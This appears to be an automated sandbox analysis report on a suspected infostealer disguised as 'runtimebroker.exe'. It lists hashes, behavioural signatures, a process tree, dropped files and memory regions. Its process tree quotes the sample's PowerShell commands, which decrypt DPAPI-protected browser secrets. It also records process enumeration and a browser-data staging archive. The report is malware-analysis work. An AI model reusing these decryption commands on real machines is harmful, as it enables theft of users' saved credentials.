Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02/06/2024, 15:27

General

  • Target

    runtimebroker.exe

  • Size

    154.7MB

  • MD5

    75990ee1ed0dd57459df924c28b46700

  • SHA1

    be7d7c518a44b3d73230364fd2064f9e2918f733

  • SHA256

    43ebd800204d360a8ea88eb0d2ed10df9553a910741cd5646ed7d276fd0723a5

  • SHA512

    f1337181f33e6724939859dc5d9fff45242870b36021fb45c737a261f82ed56e594370a24afe87f94a4376e92c0391604714fa2ff80ec000709fc66bc48341e2

  • SSDEEP

    1572864:WQLTsMunuCM2/w9Asn6xzIEhw3JvqzPd24cwT3tIDvvEO/TZidNoyiMhOab0XLHE:WA8g5vu

Score
7/10

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe
    "C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4968
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4652
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1204
    • C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe
      "C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\runtimebroker" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1804,i,13315901716799113508,4177451301677030067,131072 --disable-features=BlinkSchedulerMicroTaskQueuePerWindowAgent,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
        PID:4856
      • C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe
        "C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\runtimebroker" --mojo-platform-channel-handle=2020 --field-trial-handle=1804,i,13315901716799113508,4177451301677030067,131072 --disable-features=BlinkSchedulerMicroTaskQueuePerWindowAgent,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        2⤵
          PID:3476
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')"
          2⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:3720
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4372
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')"
          2⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:4308
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3548
        • C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe
          "C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\runtimebroker" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1336 --field-trial-handle=1804,i,13315901716799113508,4177451301677030067,131072 --disable-features=BlinkSchedulerMicroTaskQueuePerWindowAgent,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1396

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              f69f145ee494b2d67c5d50108c862d4a

              SHA1

              68f36b9bd553beb2a7eec5f4a8fef317703c77e1

              SHA256

              06dd71fdfda7e319131bf98bd21dc6bee9a480736ab688e52bafe10074f00fc7

              SHA512

              302489f1e2676d83cf9cf92d378176a230f15975af12e2a2a50d9c057f4de0fc2c22f68a9390f5b337eaa10ea77366a1a79e71808de1e7a7c4e6432aeb75c530

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              0cb10f06f4bd19bfda39ddabbeb66be7

              SHA1

              fa4dbe8d73f76669fcae8b456a59b55bbc75c66f

              SHA256

              93083452e49af786b11cec45977aec8924ea4312ffba4a1d3c6d8c679b4acb50

              SHA512

              c838f84af0ef903d954cf0d33c87830bb53452405c1ef8f9af2625125bafdf4fed1151ec5e5901a6ad0fcd963b9b31bb3173fc5c246a53a75af9501abf316b22

            • C:\Users\Admin\AppData\Local\Temp\00ead14d-7e54-4b24-93ed-811972e8a387.tmp.node

              Filesize

              1.6MB

              MD5

              aa8da32ebca307d4f99cf2da290afd22

              SHA1

              8590c0b54987ad6b0bc15a1aa66b9d2ca65ca899

              SHA256

              ed3a86d32e83849720e150c18c4d19c90cabe912d674624f34051c19936167db

              SHA512

              d7809a39922d99a716744e6cc17e4094930c40a8a21c983830c3570c4e52846151d66ad5d6021bc2a5b5fd29f520465b7b88f71cb86c30e0fadc4d0fb21ee1d7

            • C:\Users\Admin\AppData\Local\Temp\92739948-3847-406c-8710-566a0e463b12.tmp.node

              Filesize

              137KB

              MD5

              04bfbfec8db966420fe4c7b85ebb506a

              SHA1

              939bb742a354a92e1dcd3661a62d69e48030a335

              SHA256

              da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd

              SHA512

              4ea97a9a120ed5bee8638e0a69561c2159fc3769062d7102167b0e92b4f1a5c002a761bd104282425f6cee8d0e39dbe7e12ad4e4a38570c3f90f31b65072dd65

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jjx1jily.fqm.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\xx_lol\Browser.zip

              Filesize

              22B

              MD5

              76cdb2bad9582d23c1f6f4d868218d6c

              SHA1

              b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

              SHA256

              8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

              SHA512

              5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

            • memory/1396-60-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-53-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-52-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-51-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-58-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-63-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-62-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-61-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-59-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-57-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/4372-20-0x000001B756180000-0x000001B7561D0000-memory.dmp

              Filesize

              320KB

            • memory/4372-16-0x000001B73DAB0000-0x000001B73DAD2000-memory.dmp

              Filesize

              136KB